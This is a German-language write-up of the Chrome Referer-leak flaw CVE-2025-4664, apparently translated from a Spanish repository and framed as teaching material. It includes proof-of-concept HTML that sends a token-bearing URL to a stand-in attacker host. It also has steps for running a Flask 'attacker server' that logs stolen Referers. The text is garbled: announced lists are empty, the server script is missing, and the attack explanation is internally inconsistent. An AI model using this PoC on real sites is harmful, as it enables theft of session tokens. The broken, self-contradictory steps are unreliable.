
Die Schwachstelle CVE-2025-4664 ist ein Sicherheitsfehler mit hoher Schwere, der in der Loader-Komponente von Google Chrome in Versionen vor 136.0.7103.113 identifiziert wurde. Dieses Problem ermöglicht es einem entfernten Angreifer, durch eine speziell gestaltete HTML-Seite Daten über Ursprünge hinweg (Cross-Origin) zu exfiltrieren, wodurch sensible Informationen wie Sitzungstokens oder Authentifizierungsdaten kompromittiert werden können.
Der Fehler liegt in einer unzureichenden Umsetzung der Sicherheitsrichtlinien in der Loader-Komponente von Chrome. Konkret interpretiert Chrome die Direktive referrer-policy im HTTP-Link-Header bei Anforderungen von Unterressourcen (wie Bildern oder Skripten), obwohl andere Browser dies nicht tun. Ein Angreifer kann dies ausnutzen, indem er eine weniger restriktive Richtlinie wie unsafe-url festlegt, was dazu führt, dass Chrome vollständige URLs – einschließlich sensibler Parameter – an vom Angreifer kontrollierte Domains übermittelt.
Diese Schwachstelle wurde in realen Umgebungen aktiv ausgenutzt, weshalb die US-amerikanische Behörde für Cybersicherheit und Infrastruktursicherheit (CISA) sie in ihren Katalog bekannter und ausgenutzter Schwachstellen (KEV) aufgenommen hat. CISA hat den 5. Juni 2025 als Frist festgelegt, bis zu der Bundesbehörden die entsprechenden Korrekturen anwenden müssen.
Google hat Updates zur Behebung dieser Schwachstelle in den folgenden Versionen veröffentlicht:
Allen Benutzern wird dringend empfohlen, ihren Chrome-Browser auf die neueste verfügbare Version zu aktualisieren. So überprüfen und installieren Sie das Update:
Darüber hinaus sollten Nutzer von Chromium-basierten Browsern wie Microsoft Edge, Brave, Opera und Vivaldi die entsprechenden Updates im Auge behalten, da auch sie von dieser Schwachstelle betroffen sein könnten.
Den Browser aktuell zu halten ist unerlässlich, um sich vor aktiven Sicherheitsbedrohungen zu schützen und persönliche Daten zu sichern.
Die Schwachstelle CVE-2025-4664 wird ausgenutzt, indem die Art und Weise manipuliert wird, wie Google Chrome die Referrer-Policy (referrer-policy) beim Laden von Unterressourcen (wie Bildern, Skripten usw.) aus HTML-Links handhabt.
🌐 Erstellung einer bösartigen Website:
Der Angreifer erstellt eine Website, die in ihrem HTTP-Header einen HTML-Link wie diesen enthält:
<link rel="preload" as="image" href="https://victima.com/imagen.jpg" referrerpolicy="unsafe-url">
🔧 Manipulation der referrer-policy: In den meisten Browsern wird diese referrerpolicy im -Tag nicht auf die geladene Ressource angewendet. Chrome wendet sie jedoch an, was den Kern des Problems darstellt.
📤 Herausfiltern des Referers: Wenn der Browser des Opfers (Chrome) die Ressource von victima.com lädt, sendet er die gesamte URL der Ursprungsseite als Referer-Header, was Folgendes enthalten kann:
<link rel="preload" as="image" href="https://atacante.com/captura.jpg" referrerpolicy="unsafe-url">
Wenn das Opfer auf diese Ressource zugreift, sendet Chrome seine vollständige URL als Referer an den Server des Angreifers.
1- Der Angreifer sendet dem Opfer einen Link zu:
https://atacante.com/pagina-maliciosa.html
<link rel="preload" as="image" href="https://victima.com/perfil?token=ABC123" referrerpolicy="unsafe-url">
Referer: https://victima.com/perfil?token=ABC123
an die Angreifer-Domain und legt so das Token offen.

index.html — OpferdateiDiese Datei simuliert das Opfer des Angriffs. Es ist eine vereinfachte HTML-Demo, die zeigt, wie die Schwachstelle CVE-2025-4664 mithilfe eines bösartigen -Tags ausgenutzt werden kann:
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>Demo CVE-2025-4664</title>
<!-- Este recurso apunta a un sitio de la víctima con información sensible en la URL -->
<link rel="preload" as="image"
href="https://victima.com/perfil?token=ABC123"
referrerpolicy="unsafe-url">
</head>
<body>
<h1>Demostración de la vulnerabilidad CVE-2025-4664</h1>
<p>Si estás usando una versión vulnerable de Chrome, el navegador enviará el <strong>Referer completo</strong> a la URL de arriba.</p>
</body>
</html>
servidor_atacante.py — AngreiferdateiMit diesem Skript lässt sich der Angriff automatisieren, um die Referer mithilfe eines kleinen Python-Servers zu erfassen. Hier ist ein Beispiel mit Flask, um den Server des Angreifers zu simulieren, der die Daten empfängt:
index.html dargestellte Opfer.pip install flask
python servidor_atacante.py
<link rel="preload" as="image"
href="http://<tu_IP>:8080/captura.jpg"
referrerpolicy="unsafe-url">
Ersetze <tu_IP> durch die öffentliche oder lokale IP des Servers, auf dem das Skript ausgeführt wird.
Öffne ein Terminal (PowerShell oder CMD).
Navigiere zum Ordner der Datei:
cd "C:\Users\Sebas\Desktop\servidor_atacante"
python servidor_atacante.py
* Running on http://127.0.0.1:8080
* Running on http://192.168.1.35:8080
Erstelle in demselben Ordner (C:\Users\Sebas\Desktop\servidor_atacante) eine Datei namens index.html mit folgendem Inhalt:
<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8">
<title>Demo CVE-2025-4664</title>
<!-- Simula el ataque -->
<link rel="preload" as="image"
href="http://192.168.1.35:8080/captura.jpg"
referrerpolicy="unsafe-url">
</head>
<body>
<h1>Simulación CVE-2025-4664</h1>
<p>Este HTML intenta filtrar la URL completa (incluyendo el token) al atacante.</p>
</body>
</html>
✅ Wichtig: Stelle sicher, dass die IP (192.168.1.35) mit der von Flask angezeigten lokalen IP übereinstimmt. Wenn sie anders ist, ändere sie im HTML.
Öffne Chrome.
Gib in die Adressleiste Folgendes ein:
file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
Drücke Enter.
📥 Ergebnis auf dem Server anzeigen In der Flask-Konsole solltest du etwa Folgendes sehen:
[+] Referer recibido: file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
[Zielordner]: Ersetze diesen Parameter durch den Ort, an dem die Datei gespeichert ist.
🎯 Das bedeutet, dass der Browser den vollständigen Referer an den Angreifer gesendet hat!
Erklärung erstellt von Sebastian Peinador zu Lehr- und Forschungszwecken im Bereich offensiver Cybersicherheit.
Dieses Material wird unter der MIT-Lizenz verbreitet.
Wenn es dir nützlich erscheint, vergiss nicht, dem Repo einen ⭐ zu geben oder es zu teilen!